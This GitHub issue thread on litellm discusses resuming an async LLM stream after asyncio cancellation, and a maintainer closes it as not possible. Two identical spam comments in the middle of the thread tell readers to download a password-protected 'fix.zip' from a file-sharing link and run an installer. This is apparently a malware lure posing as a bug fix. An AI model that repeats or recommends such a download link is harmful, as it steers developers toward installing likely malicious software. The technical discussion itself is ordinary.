### ISSUE TITLE
[Bug]: Unable to continue async streaming after cancellation

### ISSUE THREAD

**Issue by jamesleeht** [BerriAI/litellm#5359]
### What happened?

Here is an example usage:

```
chunks = []
try:
    async for chunk in stream_resp:
        text = chunk.choices[0].delta.content or ""
        yield text
        chunks.append(chunk)
# If coroutine cancelled, we still want to collect all chunks.
except asyncio.CancelledError:
    async for chunk in stream_resp:
        chunks.append(chunk)

response = litellm.stream_chunk_builder(chunks, messages=messages)
```

This doesn't seem to work. The use case would be to save the rest of the stream when HTTP responses are cancelled in certain frameworks like [Django](https://docs.djangoproject.com/en/5.0/ref/request-response/#handling-disconnects).

Is there any way to make this work with LiteLLM?

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ghost** [comment]
Hi @jamesleeht 

> # If coroutine cancelled, we still want to collect all chunks.
except asyncio.CancelledError:
    async for chunk in stream_resp:
        chunks.append(chunk)

If the call is cancelled, as long as the backend llm api call is cancelled this should still work. But if the api call is cancelled/task running the call is cancelled then i'm not sure how it would work

**Comment by jamesleeht** [comment]
> If the call is cancelled, as long as the backend llm api call is cancelled this should still work. But if the api call is cancelled/task running the call is cancelled then i'm not sure how it would work

Hey @krrishdholakia, from my testing the second iteration over the generator inside CancelledError will run, but no new chunks will be produced. I believe this is because you cannot iterate over a generator twice in Python

**Comment by ghost** [comment]
that makes sense. so what would you expect litellm to do here? @jamesleeht

**Comment by jamesleeht** [comment]
> that makes sense. so what would you expect litellm to do here? @jamesleeht 

Could there be a way to continue the stream where it left off? Maybe to save the progress of the stream.

Currently the alternative would be to regenerate a response from scratch instead of continuing the paused stream.

Not sure if this is possible though, and I understand if it isn't :) 

thanks for the quick response

**Comment by ghost** [comment]
if the stream is cancelled, then i don't think there's a way for us to resume it (assuming the connection already ended). 

If you find a way to do this, we'd welcome a pr here! 

Closing for now, as this seems like a no-op (currently).
